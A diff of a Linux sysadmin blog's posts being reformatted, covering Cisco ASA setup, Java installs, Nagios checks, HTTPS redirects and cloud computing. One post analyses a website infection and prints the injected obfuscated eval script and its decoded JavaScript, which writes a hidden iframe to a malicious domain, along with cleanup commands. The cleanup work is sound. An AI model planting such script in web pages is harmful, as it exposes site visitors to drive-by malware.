1 source/_posts/2009-01-27-howto-upgrade-asdm-using-cli-on-cisco-asa5500.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-01-27 06:18:17'
layout: post
View
3 source/_posts/2009-01-27-what-phone-does-a-sys-admin-need.markdown
@@ -1,6 +1,7 @@
---
author: pim-van-der-wal
published: true
+comments: true
date: '2009-01-27 07:58:37'
layout: post
slug: what-phone-does-a-sys-admin-need
@@ -16,8 +17,6 @@ tags:
Recently we were discussing our favorite phones and gadgets. By now we use our phones as mobile terminals so when the question of upgrading came up we looked at the requirements we have from that perspective. The first requirement is an SSH client of course. Most smart phones do have an SSH client of sorts but whether it's a stable app or it's an unstable afterthought is pretty important. By Googling around a bit I found that the SSH clients on the Windows Mobile platform receive less than favorable reviews so I'll be staying away from those. Problems trying to connect and general instability seem to be the most common problems. Three manufacturers who appear to have decent SSH clients are Apple, Google and RIM. The Blackberries have been around in that arena for the longest time and have a very good track record.
-
-
Multi tasking is next on my list. I don't want to have to close any apps (like the SSH client) to be able to do some browsing. Granted, we're looking at phones and not laptops but when there is an emergency that requires the use of an SSH client on my phone communication with other people (chat, e-mail) is right up there in urgency. So far from our three contenders both the RIM Blackberries and the Google Android phones meet that criterium. The Apple iPhone however does not.
Battery life is third on the list. Although it is very important because these devices have pretty big screens and tons of energy absorbing features they mostly charge from USB ports which can be connected pretty much anywhere these days. I don't know the battery life of the current generation of BlackBerries but again, they have a pretty decent reputation. The dishonorable mention here is for the Google Android phone. The battery life for this device is pretty bad from what I've heard.
View
1 source/_posts/2009-01-27-xvidencopts-is-not-an-mencoder-option.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-01-27 08:18:41'
layout: post
View
8 ...09-01-30-web-site-performance-sys-admins-may-be-of-little-help-call-the-designer.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-01-30 01:08:24'
layout: post
@@ -22,15 +23,8 @@ Steve's Performance golden rule:
Here is the older Yahoo video 
-
-
[Steve Souders: "High Performance Web Sites: 14 Rules for Faster Pages"](http://video.yahoo.com/watch/1040890/3880720) @ [Yahoo! Video](http://video.yahoo.com)
-
-;
-
Followed by the more recent Google talk
-
-
Check out Yslow firefox plug in as well as the [IBM Page Detailer](http://www.alphaworks.ibm.com/tech/pagedetailer) - its the product he uses to map out the front end work of the browser.  Great tools to start thinking about why your website is slow or why pages are loading slow.
View
39 source/_posts/2009-02-02-adbard-dont-die.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-02-02 14:37:49'
layout: post
@@ -14,43 +15,41 @@ categories:
- monitoring
---
-So a couple of weeks ago I touted the [AdBard](http://adbard.net/) folks and their FLOSS oriented ad network system.  Today we received the following email from them.  What is worse, is that the ads have already stopped appearing on the site.  .
+So a couple of weeks ago I touted the [AdBard](http://adbard.net/) folks and their FLOSS oriented ad network system.  Today we received the following email from them.  What is worse, is that the ads have already stopped appearing on the site.
It looks like they will be teaming up with  [Free Software Foundation](http://www.fsf.org/).
+> This email details your current earnings from your participation in the Ad Bard Network.  We are also excited to announce major changes to our network, including general improvements and the direct participation of the Free Software Foundation.  However, our planned changes require that we temporarily suspend the entire network for the month of February.  As a member you will be receiving payment for your outstanding earnings balances, and then if you elect to participate in our newly structured network you will be required to sign up again.  We apologize for the inconvenience of this, but hope that it helps achieve the end goal of increasing the earnings of member websites and improving the desirability of the network for advertisers.
-> Hello,
+> Statistics:
+> -----------
+> LInux System Admin Blog average ad impressions:
+> Hourly:           nn
+> Daily:           nnn
+> Monthly:      nnnnn
-This email details your current earnings from your participation in the Ad Bard Network.  We are also excited to announce major changes to our network, including general improvements and the direct participation of the Free Software Foundation.  However, our planned changes require that we temporarily suspend the entire network for the month of February.  As a member you will be receiving payment for your outstanding earnings balances, and then if you elect to participate in our newly structured network you will be required to sign up again.  We apologize for the inconvenience of this, but hope that it helps achieve the end goal of increasing the earnings of member websites and improving the desirability of the network for advertisers.
+> Outstanding earnings: $nnn
-Statistics:
------------
-LInux System Admin Blog average ad impressions:
-Hourly:           nn
-Daily:           nnn
-Monthly:      nnnnn
+> Due to the upgrade in process, please remove the JavaScript snippet from your website at this time.  No further advertisements will be displayed through this snippet, and before the end of February 2009 the handling for this javascript will be disabled and could result in an error on your website.  If you will require more than 2 weeks to remove the snippet, please send us an email and we will work with you as necessary.  A new snippet will be provided for the new website.
-Outstanding earnings:
-$nnn
-
-Due to the upgrade in process, please remove the JavaScript snippet from your website at this time.  No further advertisements will be displayed through this snippet, and before the end of February 2009 the handling for this javascript will be disabled and could result in an error on your website.  If you will require more than 2 weeks to remove the snippet, please send us an email and we will work with you as necessary.  A new snippet will be provided for the new website.
-
-We will be issuing payments for all outstanding earnings through PayPal or via a check.  If your payment information has changed, please respond
+> We will be issuing payments for all outstanding earnings through PayPal or via a check.  If your payment information has changed, please respond
to this email with updated details.  Please be sure to include your Ad Bard username in your email.
-If you have converted earnings into unused coupons, please reply to this email with details so that we are sure to properly credit you
+> If you have converted earnings into unused coupons, please reply to this email with details so that we are sure to properly credit you
back.
-Details about our enhanced network will be posted to [http://adbard.net/](http://adbard.net/) over the upcoming month.  You will also be receiving an update via email when it is possible to sign up for the new network.  A few of the planned changes include a limited number of advertising slots, the ability to participate in approving which FLOSS-appropriate advertisements are accepted, and improvements to our payment algorithms.
+> Details about our enhanced network will be posted to [http://adbard.net/](http://adbard.net/) over the upcoming month.  You will also be receiving an update via email when it is possible to sign up for the new network.  A few of the planned changes include a limited number of advertising slots, the ability to participate in approving which FLOSS-appropriate advertisements are accepted, and improvements to our payment algorithms.
The Free Software Foundation is actively advising us in this effort, and will help campaign for the new network once it goes live.
-Thank you for your patience and participation in our evolving network. We hope that you like the changes that will be happening this month, and
+> Thank you for your patience and participation in our evolving network. We hope that you like the changes that will be happening this month, and
that you will continue to participate.
-Cheers, -Jeremy
+> Cheers, -Jeremy
---
+> --
Jeremy Andrews
877-875-8824 x100
Tag1 Consulting, Inc.
[ ](http://tag1consulting.com/)
+
+
View
7 .../_posts/2009-02-03-cisco-asa-5505-asdm-error-unconnected-sockets-not-implemented.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-02-03 07:53:51'
layout: post
@@ -17,8 +18,10 @@ tags:
---
If you run a version of **Java JRE newer than v6 Update 10** (latest at this time is _V6 Update 12_) and see this error when trying to connect to a Cisco ASA ASDM interface:
-**“ASDM is unable to continue loading. Click OK to exit from ASDM.
-Unconnected sockets not implemented.”**
+`
+ASDM is unable to continue loading. Click OK to exit from ASDM
+Unconnected sockets not implemented.
+`
then you are probably running an older ASA software (6.1.5 released on 09-OCT-2008 and older ones have this issue) and you need to upgrade in order to fix this issue. Any version newer than **6.1.5.51** (that is the latest one available at this time) will work as expected. This version was released by Cisco to fix this issue on 16-DEC-2008.
The upgrade is simple and you can use my [step by step guide](http://linuxsysadminblog.com/2009/01/howto-upgrade-asdm-using-cli-on-cisco-asa5500/) for this; just keep in mind you will have to reboot do activate the upgrade. After this, your ASDM should be working again.
View
1 source/_posts/2009-02-04-extending-the-slow-query-log.markdown
@@ -1,6 +1,7 @@
---
author: pim-van-der-wal
published: true
+comments: true
date: '2009-02-04 15:54:30'
layout: post
slug: extending-the-slow-query-log
View
31 source/_posts/2009-02-09-upgrade-to-java-se-6-update-12-on-fedora-10.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-02-09 17:10:53'
layout: post
@@ -21,27 +22,35 @@ After our ASA units were updated to the latest version of ASDM my **Java** clien
The install steps are:
Grand executable permission to installer file
-`chmod +x jdk-6u12-linux-i586-rpm.bin`
+```
+chmod +x jdk-6u12-linux-i586-rpm.bin
+```
Run installer file
-`./jdk-6u12-linux-i586-rpm.bin`
+```
+./jdk-6u12-linux-i586-rpm.bin
+```
Rename symbolic links pointing to old java programs
-`cd /etc/alternatives
+```
+cd /etc/alternatives
mv java java_old
mv javaws java_old
-mv keytool keytool_old`
+mv keytool keytool_old
+```
Create new symbolic links
-`cd /etc/alternatives
+```
+cd /etc/alternatives
ln -s /usr/java/latest/bin/java java
ln -s /usr/java/latest/bin/javaws javaws
-ln -s /usr/java/latest/bin/keytool keytool`
+ln -s /usr/java/latest/bin/keytool keytool
+```
Verify that new java version is installed
-`javaws`
-_Java(TM) Web Start 1.6.0_12
+```
+javaws
+Java(TM) Web Start 1.6.0_12
Usage: javaws [run-options]
- javaws [control-options]
-_
-
+ javaws [control-options]
+```
View
3 source/_posts/2009-02-10-howto-recover-from-a-corrupt-rpm-database.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-02-10 06:27:13'
layout: post
@@ -14,7 +15,7 @@ tags:
- Centos
- fedora
- rhel
-- rpm
+- rpms
- yum
---
View
1 source/_posts/2009-02-17-cisco-asa-5505-activestandby-failover-configuration.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-02-17 06:35:57'
layout: post
View
26 source/_posts/2009-02-17-cloud-computing-scenarios-for-database-servers.markdown
@@ -1,6 +1,7 @@
---
author: pim-van-der-wal
published: true
+comments: true
date: '2009-02-17 10:09:35'
layout: post
slug: cloud-computing-scenarios-for-database-servers
@@ -23,17 +24,22 @@ tags:
We've been investigating the possibilities of using cloud computing for our clients. Especially Amazon EC2 has the potential to be be really effective in offering flexible, pay-as-you-go computing. From my own perspective I have been looking at how to use cloud computing in combination with MySQL and I must say that I'm a bit sceptical about the effectiveness of cloud computing in replacing the primary database server. First off there does not seem to be that much in the way of performance data for this type of installation. Can a cloud server really offer the I/O performance necessary to replace a dedicated database server? And even if the performance is equal, what is the main advantage? Scaling web sites is done by adding more servers in most cases but the same approach only works for database servers when clusters are used. So in what other scenario's does cloud computing give us an edge?
-**Temporary reporting servers
-**Create a one time copy of an existing production database server to run specific heavy reports. This is ideal for monthly reports since the server only needs to be up and running for several hours per month.
+**Temporary reporting servers**
-**Backup database server
-**This is a backup solution where the server is only allocated once there is a problem with the primary server which makes a lot of sense because the client only pays for the server once it is used. One downside to this scenario is that the server has to created and loaded with the latest backup which will result in a decent amount of downtime but at least all of this can be automated. A bigger problem is the loss of data since the latest backup.For our high availability sites we have a standby database server replicating all changes from the master so we can switch over at a moment's notice without losing any data.
+Create a one time copy of an existing production database server to run specific heavy reports. This is ideal for monthly reports since the server only needs to be up and running for several hours per month.
-**Migrations
-**Performing a migration or a system upgrade usually brings some downtime. Promoting a standby system to primary creates a single point of failure so it makes sense to create a remporary standby of the standby.
+**Backup database server**
-**Development branches and testing environments
-**For development branches we usually only need an extra database for a short amount of time although truth be told, those database are not very large in general so we tend to put them on the same development database server anyway. The same is true for testing and QA. These activities usually occur in cycles which means that they are very attractive targets for cloud based servers.
+This is a backup solution where the server is only allocated once there is a problem with the primary server which makes a lot of sense because the client only pays for the server once it is used. One downside to this scenario is that the server has to created and loaded with the latest backup which will result in a decent amount of downtime but at least all of this can be automated. A bigger problem is the loss of data since the latest backup.For our high availability sites we have a standby database server replicating all changes from the master so we can switch over at a moment's notice without losing any data.
-**Alternative data center
-**Yes, it happened to us once that our datacenter went off line due to a very heavy attack. Instead of finding another data center for these eventualities it could be useful to have cloud based backup servers defined. However, this requires the extra effort of keeping these instances up to date for this eventuality. Additionally, DNS caching will stop the switch from being instantaneous. A geographical load balancing solution would be the answer to that but at that point the cost for preparing for this eventuality will have to be compared to the loss due to down time.
+**Migrations**
+
+Performing a migration or a system upgrade usually brings some downtime. Promoting a standby system to primary creates a single point of failure so it makes sense to create a remporary standby of the standby.
+
+**Development branches and testing environments**
+
+For development branches we usually only need an extra database for a short amount of time although truth be told, those database are not very large in general so we tend to put them on the same development database server anyway. The same is true for testing and QA. These activities usually occur in cycles which means that they are very attractive targets for cloud based servers.
+
+**Alternative data center**
+
+Yes, it happened to us once that our datacenter went off line due to a very heavy attack. Instead of finding another data center for these eventualities it could be useful to have cloud based backup servers defined. However, this requires the extra effort of keeping these instances up to date for this eventuality. Additionally, DNS caching will stop the switch from being instantaneous. A geographical load balancing solution would be the answer to that but at that point the cost for preparing for this eventuality will have to be compared to the loss due to down time.
View
1 source/_posts/2009-02-19-cloud-computing-chart.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-02-19 07:00:28'
layout: post
View
7 source/_posts/2009-02-23-best-definition-of-cloud-computing-to-date.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-02-23 00:23:24'
layout: post
@@ -15,17 +16,14 @@ tags:
The definition of cloud computing has been rather elusive. Some CEO's like, Larry Elison are frustrated because they claim that their sofrware already runs on the cloud. Others, like the the slash dot rhino herd has made this [cloud computing definition](http://tech.slashdot.org/article.pl?sid=08/07/17/2117221&from=rss) post one of the most popular of last year:
-
> "Even though IBM's Irving Wladawsky Berger reports a leading analyst as having said recently that 'There is a clear consensus that there is no real consensus on what cloud computing is,' here are no fewer than twenty attempts at a definition of the infrastructural paradigm shift that is sweeping across the Enterprise IT world — some of them really quite good. From the article: 'Cloud computing is...the user-friendly version of grid computing.' (Trevor Doerksen) and 'Cloud computing really is accessing resources and services needed to perform functions with dynamically changing needs. An application or service developer requests access from the cloud rather than a specific endpoint or named resource.' (Kevin Hartig)"
-
But this month, the [Electrical Engineering and Computer Sciences University of California at Berkeley](http://www.eecs.berkeley.edu/) has put a highly acclaimed paper together on the cloud: [Above the Clouds: A Berkeley View of Cloud Computing](http://www.eecs.berkeley.edu/Pubs/TechRpts/2009/EECS-2009-28.pdf).
We uploaded it here also: Above the Clouds: A Berkeley View of Cloud Computing - a 25 page pdf document.
Here is how Berkely sees it: 
-
> Cloud Computing refers to both the applications delivered as services over the Internet and the hardware and systems software in the datacenters that provide those services.
The services themselves have long been referred to as Software as a Service (SaaS).
@@ -36,7 +34,4 @@ We use the term Private Cloud to refer to internal datacenters of a business or
Thus, Cloud Computing is the sum of SaaS and Utility Computing, but does not include Private Clouds.
-
-
-
The paper is great - it is interesting to read, has some great quotes and it lists opportunities and the current top 10 obstacles to cloud computing.  Highly recommended.
View
3 ...clouds-come-down-to-earth-cloud-services-crash-just-like-everyone-else-sometimes.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-02-24 12:39:50'
layout: post
@@ -14,10 +15,8 @@ categories:
During our weekly sysadmin call this morning several of our experienced sysadmins quickly pointed out that clients seeking very high up time should not necessarily look for it on the cloud.  I couldn't believe it, but almost as an omen, this story came on my RSS feed from Webware:  [Google apologizes for email outage](http://news.cnet.com/8301-17939_109-10170636-2.html?part=rss&tag=feed&subj=Webware)
-
> [Outages pose problems for Google](http://news.cnet.com/8301-1023_3-9989019-93.html) as it tries to persuade companies to buy into its cloud-computing vision, in which applications are hosted on the Internet rather than on corporate computers. But Google argues its service availability is competitive with most organizations' abilities to run their own e-mail servers.
-
Clearly the google cloud isn't going to be the only one having an outage from time to time.  It seems to me that while still in the infancy, these services are vulnerable to unexpected problems, kind of like the famous first internet worm - [the Morris worm](http://en.wikipedia.org/wiki/Morris_worm) -  that brought the internet to its knees back in the 1980s.
While cloud services offer a lot of promise, and overall should offer a better level of redundancy and up time, this shows that the cloud is also not immune to some down time.
View
22 source/_posts/2009-02-24-nagios-how-to-check-if-remote-process-is-running.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-02-24 04:00:33'
layout: post
@@ -17,22 +18,26 @@ tags:
We have a monitoring server running [Nagios](http://www.nagios.org/) and we needed to add checks for Nginx process on a new server.  Basically, you only need to install NRPE to monitor services, processes, disk space, load, etc on your remote machine.  Check the [NRPE docummention](http://nagios.sourceforge.net/docs/nrpe/NRPE.pdf) for complete reference and here's a quick [NRPE installation guide for Debian](http://sysbible.org/x/2008/11/10/how-to-install-nagios-nrpe-under-debian-linux/).
For my objective i only need to check if Nginx process is running and will use the check_procs.  NRPE and Nagios Plugins were installed and i can check the Nginx process locally using the following commands:
+```
+/usr/local/nagios/libexec/check_procs -c 1:30 -C nginx
+```
-
-`/usr/local/nagios/libexec/check_procs -c 1:30 -C nginx`
-wherein :
+wherein:
`-c 1:30` <-- refers to the Critical range for number of Nginx processes. If there process count is below 1 and above 30 this will send me a Critical notice.  If you wan to add a Warning level you can use "-w 1:25" - adjust the number of processes for you needs.
` -C nginx` <-- this will check for the command name (nginx)
**NOTE:** For complete reference on this check and other samples please refer to the [NagiosWiki](http://nagioswiki.org/wiki/Plugin:check_procs) page.
Below are my configurations:
-NRPE(remote): _/etc/nagios/nrpe_local.cfg_
-`command[check_nginx]=/usr/local/nagios/libexec/check_procs -c 1:30 -C nginx`
+NRPE(remote): `/etc/nagios/nrpe_local.cfg`
+```
+command[check_nginx]=/usr/local/nagios/libexec/check_procs -c 1:30 -C nginx
+```
-Nagios(host):  _/usr/local/nagios/etc/objects/localhost.cfg_
-`define service {
+Nagios(host):  `/usr/local/nagios/etc/objects/localhost.cfg`
+```
+define service {
use generic-service ; Name of service template to use
host_name HOST/IPADDRESS
service_description CHECK_NGINX
@@ -46,6 +51,7 @@ notification_period 24x7
notification_options w,u,c,r
check_command check_nrpe!check_nginx
notifications_enabled 1
-}`
+}
+```
Nagios version is 3.0. Nagios monitoring and remote server are running Debian Etch.
View
1 ...809ckarmic-koalae2809d-will-use-eucalyptus-for-your-own-cloud-computing-solution.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-02-24 07:36:08'
layout: post
View
1 source/_posts/2009-03-03-free-trial-of-cloud-computing.markdown
@@ -1,6 +1,7 @@
---
author: pim-van-der-wal
published: true
+comments: true
date: '2009-03-03 08:55:17'
layout: post
slug: free-trial-of-cloud-computing
View
3 source/_posts/2009-03-04-apache-solr-drupal-integration.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-03-04 12:25:15'
layout: post
@@ -16,10 +17,8 @@ I am at Drupal Conference attending the Acquia Apache Solr presentation. This in
[Apache Solr](http://lucene.apache.org/solr/) is an open source project:
-
> Solr is an open source enterprise search server based on the [Lucene Java](http://lucene.apache.org/java/) search library, with XML/HTTP and JSON APIs, hit highlighting, faceted search, caching, replication, a web administration interface and many more features. It runs in a Java servlet container such as [Tomcat](http://tomcat.apache.org/).
-
Apache Solr has a lot of promise improving the search results which, considering the down sides of drupal search, would greatly improve the user experience.
Acquia has the Apache Solr search service in beta right now and it will be offered as a hosted offering.
View
29 source/_posts/2009-03-05-drupal-performance-tips-from-drupalcon.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-03-05 12:27:21'
layout: post
@@ -15,37 +16,19 @@ categories:
Still reporting from DrupalCon. So far there have been a number of sessions I have attended. Here are some highlights from those sessions on how to increase performance on your drupal site.
-
-
-
* Look at the number of requests a page makes to the server
-
-
* Use yslow to measure page rendering (often a page performance is perceived, not just based on the server response time)
-
-
-
-
* Remove search, use alternate solutions such as Apache Solr or Google Search API
-
-
* Use CDN as much as possible
-
-
* Use Reverse Proxy Cache and memcache
-
-
* Obviously use drupal cache
-
Some other notes that are somewhat related to drupal performance and site performance management in a clustered hosting environment.
**Manual updates and rollback**
-OLD WAY: tar, move/copy untar restart services
-
-OLD WAY: rsync
-
+OLD WAY: `tar, move/copy untar restart services`
+OLD WAY: `rsync`
BETTER WAY: [Capistrano ](http://www.capify.org/)
**Managing systems:**
@@ -54,13 +37,7 @@ BETTER WAY: [bcfg2](http://trac.mcs.anl.gov/projects/bcfg2)
**Monitoring Tools**
-
-
-
* Capacity Load: analyzing trends, predicting load, checking results of configuration and software changes ([cacti](http://www.cacti.net/), [munin](http://munin.projects.linpro.no/))
-
-
* Failure: analyzing downtime, notification ([nagios](http://www.nagios.org/) - using **nrpe** agents to monitor diverse services (do we use it this way?) , hyperin)
-
Use monitoring tools to closely observe cluster replication and cashing as the failures in this area are the most difficult to solve.
View
17 source/_posts/2009-03-09-htaccessmod_rewrite-force-url-to-use-sslhttps.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-03-09 23:55:43'
layout: post
@@ -16,41 +17,43 @@ tags:
In some cases you would want to have your site use SSL (https://) at all times you can do this by using:
**1.) Using Htaccess/mod_rewrite. **You only need to create a _.htaccess_ file on your home directory and add the codes below:
-`
+```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [R,L]
</IfModule>
-`
+```
The above codes may not work on other Apache/php setup but i'm not sure what's the exact configuration variable for that.
Anyway, here are my alternatives. Either of them is fine if you're running http and https on standard ports (http=80, https=443), otherwise change the value to your custom http or https port. Change _domain.com_ to your domain.
-`
+```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} ^**80**$
RewriteRule ^(.*)$ https://**domain.tld**/$1 [R,L]
</IfModule>
-``
+
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} !^443$
RewriteRule ^(.*)$ https://**domain.tld**/$1 [L,R]
</IfModule>
-`
+```
**2.) PHP function. **If your site use PHP you can redirect the url to SSL/https using this function:
-`<?php
+```
+<?php
function ForceHTTPS(){
if( $_SERVER['HTTPS'] != ``"on") {
//if( $_SERVER['SERVER_PORT'] == 80 ) { _**<<-- use this line if the above will not work.**_``
$new_url = "https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
header(``"``Location: $new_url``"``);
exit; }
}
-?>`
+?>
+```
If you are using an application/script wherein you can enter the settings for site url (either from database or config file), it is better to use that settings.
View
36 source/_posts/2009-03-10-ffmpeg-new-major-release.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-03-10 17:20:11'
layout: post
@@ -15,57 +16,22 @@ FFMPEG announces a new release today.  It releases version 0.5
The slashodot peculated this[ ffmpeg related post](http://tech.slashdot.org/article.pl?sid=09/03/10/144222&from=rss) to the top of its news today:
-
> _After many years of release-free development, FFmpeg, the most widely used audio and video codec library, has finally returned to a regular release schedule with the long-awaited version 0.5_
-
Here is a very abbreviated list of some of the improvements to the converter from the [official ffmpeg](http://ffmpeg.org/) site:
-
> Significant work to support at least decoding of all widespread mainstream proprietary codecs, such as:
-
->
->
> * decoders and encoders
-
-
> * ALAC
->
-
> * Flash Screen Video
->
-
> * WMAv2 decoder fixed, WMAv1/v2 encoder
->
-
-
->
-
> * decoders
->
-
-
-
> * Atrac3
->
-
> * MLP/TrueHD
->
-
> * On2 VP3 improvements and VP5/VP6 support
->
-
> * RealAudio Cooker and fixes for 14.4 and 28.8
->
-
> * RealVideo RV30/40
->
-
> * WMV3/WMV9/VC-1 and IntraX8 frame support for WMV2/VC-1
->
-
-
-
We sysadmins at promet have used ffmpeg in several of our projects and find it a great tool. Our recent implementations include a [video distance learning](http://powerlearning21.com) tool and its also used in some of our work for sites of [members of the house of representatives](http://baird.house.gov.hillclips.tv/) using this [video platform](http://isupport.tv).
View
9 source/_posts/2009-03-10-running-asdm-client-from-your-linux-desktop.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-03-10 16:13:30'
layout: post
@@ -21,10 +22,12 @@ For those of us who use Linux as a desktop replacement for Windows would find it
Once you do upgrade your PIX/ASA to the latest version you may run into another issue where your bundled version of java not connect with ASDM. The remedy for this if you are using Fedora 10 can be [found here](http://linuxsysadminblog.com/2009/02/upgrade-to-java-se-6-update-12-on-fedora-10/).
Now assuming that you have asdm loaded and opened access to outside over port 4443 with:
-`http server enable 4443
-http 0.0.0.0 0.0.0.0 outside`
+```
+http server enable 4443
+http 0.0.0.0 0.0.0.0 outside
+```
You can connect to your PIX/ASA over port 4443 and download the asdm.jnlp file to your pc via web browser at https://external_ip_of_asa:4443
-Once you posses the asdm.jnlp file issue `**javaws asdm.jnlp**` in terminal. Upon successful login this will create .asdm folder in your home directory with files inside, as well as a desktop shortcut. After this the asdm.jnlp is no longer needed and can be erased.
+Once you posses the asdm.jnlp file issue `javaws asdm.jnlp` in terminal. Upon successful login this will create `.asdm` folder in your home directory with files inside, as well as a desktop shortcut. After this the `asdm.jnlp` is no longer needed and can be erased.
View
15 source/_posts/2009-03-17-asa-allow-passive-ftp-traffic.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-03-17 15:03:56'
layout: post
@@ -20,12 +21,14 @@ Many ftp client will try to establish a **passive** connection with a server by
When you are managing multiple ftp servers is it rather impractical to configure specific passive port ranges for each ftp server and open these ports in the firewall. A quick and much more practical solution is to use the stateful application inspection feature of the Adaptive Security Appliance. To set-up inspection of the FTP protocol which will dynamically allow secondary ports to pass as well as allow NAT traversal of these ports we first must create an inspection policy for all interfaces which will inspect services on their standard ports:
-`class-map global-class
- match default-inspection-traffic`
+```
+class-map global-class
+match default-inspection-traffic
+```
Next configure a policy map and inspection of the ftp protocol:
-
-`policy-map global-policy
+```
+policy-map global-policy
class global-class
- inspect ftp`
-
+ inspect ftp
+```
View
46 source/_posts/2009-03-22-heurtrojanscriptiframe.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-03-22 12:25:15'
layout: post
@@ -16,52 +17,61 @@ tags:
One of my friend asked for help about virus appearing on his sites (mostly WordPress sites).  I checked it out and my Kaspersky Internet Security blocked the pages from loading, so i downloaded the files manually and scanned html with Kaspersky to determine affected files.
-
![virus2](http://linuxsysadminblog.com/images/2009/03/virus2-220x300.gif)
-
-
I noticed that the affected files were PHP and HTML only and if you compare the code of the original WordPress files with the infected one you will see the difference.  Below are sample added codes/virus:
-
-
-HTML files: `<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>`
-PHP files:  `<?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>'; ?>`
+HTML files:
+```
+<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>
+```
+PHP files:
+```
+<?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>'; ?>
+```
**What it does**
+
I'm not a virus expert and I'm curios on what this portion of code does so i looked at it. In our case the resulting text add this portion of code to the html or php files:
-`var fggge3="si";
+```
+var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');
var t=00001217
-`
+```
and you can see it tries to load an iframe:
-
-`<iframe src=http://siplank.com/qqp/ style=display:none>`
+```
+<iframe src=http://siplank.com/qqp/ style=display:none>
+```
**Virus Removal**
+
You can remove the virus by just deleting the code (sample above) on the affected files. If you need to cleanup hundred of infected files (in our case more than 800) you can do the following:
-- Get the list of infected files.  You can use grep to search for them
-`grep -Z -R "eval(String.fromCharCode(118,97,114" /path/to/site/* >> affected_file_list.txt`
-- Delete the codes by using perl/sed commands.  Repeat the commands for every files.
-`perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//'  /path/to/affected/file.htm
-perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//"  /path/to/affected/file.php`
+* Get the list of infected files.  You can use grep to search for them
+```
+grep -Z -R "eval(String.fromCharCode(118,97,114" /path/to/site/* >> affected_file_list.txt
+```
+* Delete the codes by using perl/sed commands.  Repeat the commands for every files.
+```
+perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//'  /path/to/affected/file.htm
+perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//"  /path/to/affected/file.php
+```
Or create a bash/shell script to do the cleanup at once:
-`
+```
while read line
do
perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//'  $line
perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//"   $line
done < affected_file_list.txt
-`
+```
That's all.
View
9 source/_posts/2009-03-23-remove-passphrase-from-private-key.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-03-23 01:56:12'
layout: post
@@ -16,8 +17,8 @@ tags:
We have several SSL to transfer to our new load-balancer (Nginx) and all of the private keys contain passphrase. During Nginx (same with Apache) service restart it requires to enter the passphrase of all certificates, so we need to remove it.
This task is very simple, you only need to issue this command:
+```
+/usr/sbin/openssl rsa -in privkey_with_passphrase.key -out privkey_without_passphrase.key
+```
-`/usr/sbin/openssl rsa -in privkey_with_passphrase.key -out privkey_without_passphrase.key`
-
-******_This will prompt you to enter the current passphrase_.
-
+_This will prompt you to enter the current passphrase_.
View
27 source/_posts/2009-03-24-adding-custom-mantis-bug-status.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-03-24 03:15:52'
layout: post
@@ -19,27 +20,31 @@ To do this we need to edit two files, _config_inc.php_ and _custom_strings_inc.p
**Changes to config_inc.php:**
Find this line (bottom):
-`$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
-80:resolved,90:closed';`
-
-
+```
+$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
+80:resolved,90:closed';
+```
and insert your new bug status together with its number. You can assign the number depending on the level of status that you want. Example my GTG status is higher than "resolved" but less than "closed" so i can assign 81 to 89.
-`$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
-80:resolved,85:GTG,90:closed';`
